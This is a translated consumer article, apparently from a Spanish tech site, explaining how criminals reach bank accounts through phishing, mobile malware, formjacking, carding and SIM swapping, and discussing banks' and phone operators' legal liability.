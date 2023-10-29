Banks exist for the purpose of leaving our money and keeping it safe. But it’s not always like this. Cybercriminals have many ways to access our banking details. Especially sensitive data that is very juicy for attackers and a serious concern for those affected.

The Payment Services Law requires banks to implement the necessary security measures to “verify the identity of the payer.” That is, make sure that the person who is making a movement is the owner of the account and not someone else without permission. On the other hand, the user has the responsibility not to act negligently. Something that is not always fulfilled. And cyber attackers take advantage of this.

Phishing: the most common deception

The type of attack in which fraudulent messages are sent to many users in the hope that someone will sting and be deceived is known as ‘phishing’. An example is the classic SMS impersonating the bank. Basically, many users who receive it will simply ignore it, but there will be those who believe that it is official and decide to access the website it tells them.

The objective of these SMS is for us to access a website similar to that of our bank and give them confidential information, such as passwords or credit card information, thinking that it is the bank that is asking us for it. A deception that can be more or less credible, because sometimes these SMS have some specific information from us that facilitates the deception.

Here we must remember that the bank will never ask us for information directly by SMS or by mail. If the bank needs something from us, they either send us a certified letter or they can notify us digitally, but the indication will be for us to contact us or look at it. But never through a link.

In addition to our bank, phishing attacks also try to impersonate other public institutions such as the Treasury, the Post Office or the Police, in addition to companies with which we may have contracted a payment service, such as Iberia, Microsoft or Amazon.

INCIBE’s advice to avoid phishing is to pay close attention to the communications they make to us. Make sure that the original email address is correct, that the subject is not suspicious, that the QR code does not take us to a false platform, that the spelling is perfect, that it is not a generic message and above all, be suspicious when it is ask for sensitive information.

In case it is too late and we have been victims, it is best to contact the bank directly, explain what happened and have them change the necessary security measures.

Malware: watch what you install

Another way that cyber attackers can enter our bank is by infecting the mobile phone with some type of malware. Here you have to be careful not to install applications of unknown origin or download files of dubious origin.

The truth is that modern mobile operating systems already apply their own anti-malware layer, so it is not so easy to install these programs. If these protections are passed, our mobile could be compromised and, for example, what is displayed on the device’s screen could be seen by cybercriminals.

The access achieved is almost total. Cybercriminals can have access to contacts, messages, photos, location, record audio, take photos or videos, access files… even install other applications without us knowing. For example, a keylogger that record keystrokes. That is, the introduction of passwords that we place on the bank’s websites. Although these are secure a priori, cybercriminals can see when we are writing them if they have managed to compromise the security of our mobile phone.

Other sophisticated: el ‘formjacking’

This is a case where the user has no way of verifying that they are being attacked. Formjacking is a type of attack known as ‘Man-in-the-middle’. The technique consists of compromising the payment system of a website, introducing malicious code that goes unnoticed and collecting all the data entered into it.

That is, the user pays on a website and everything works as it should. However, that operation has been compromised and in addition to the company, cybercriminals are also taking over banking details, such as the credit card entered. CVV includedas we already saw with the Air Europa case.

Here the user is not negligent. In fact, it is the company that has been hacked. But instead of targeting the company, the objective of this hack is to attack its users. With this method, thousands of credit cards have been leaked, which has resulted in penalties of hundreds of thousands of euros.

Just with your card number they can do a lot

To access our bank account you do not need all the card details. Sometimes numbers and some social engineering are enough. We are talking about the scam known as ‘Carding’. In it, cybercriminals first obtain our card information and then use it fraudulently so that we end up paying your purchases.

The number is obtained from leaks through security breaches. Here we explain how to know if our passwords or personal data have been leaked online.

Fortunately, it is increasingly common for credit cards to implement additional security measures for paying online. Requiring us to enter a number or password when a purchase is made.

The dangers of SIM Swapping





One of the security mechanisms of banks is to link everything to our mobile phone. Send us an SMS to verify that it is us. However, another of the cybercriminals’ techniques is ‘SIM swapping’. Basically it consists of deceiving the employee of the operator’s store and make a copy of our SIMproviding a falsified ID.

Once you obtain the copy of the SIM, you now have access to digital banking and can reset the password by requesting it by SMS. A message that arrives precisely at the telephone number that we have given to the bank, but that with this method is also in their possession.

Here the responsibility falls on the side of the operators. In 2022, the AEPD fined Movistar (900,000 euros), Orange (700,000 euros), MásMóvil (200,000 euros) and Vodafone (3,940,000 euros) for not applying sufficient measures to protect their customers from SIM swapping.

Banks also have responsibility

Although the error in some cases is the user’s, the truth is that the banks also have a large part of the responsibility. Their position is that cases such as phishing are “gross negligence” on our part and they refuse to accept consequences. However, current jurisprudence defends that it must be the bank that is responsible and return the stolen amount to customers in cases of phishing.

According to the Provincial Court, there is no such serious negligence because there is premeditated deception by a third party to gain your trust. And there was a failure on the part of the bank to prevent phishing fraud.

Imagen | FLY:D

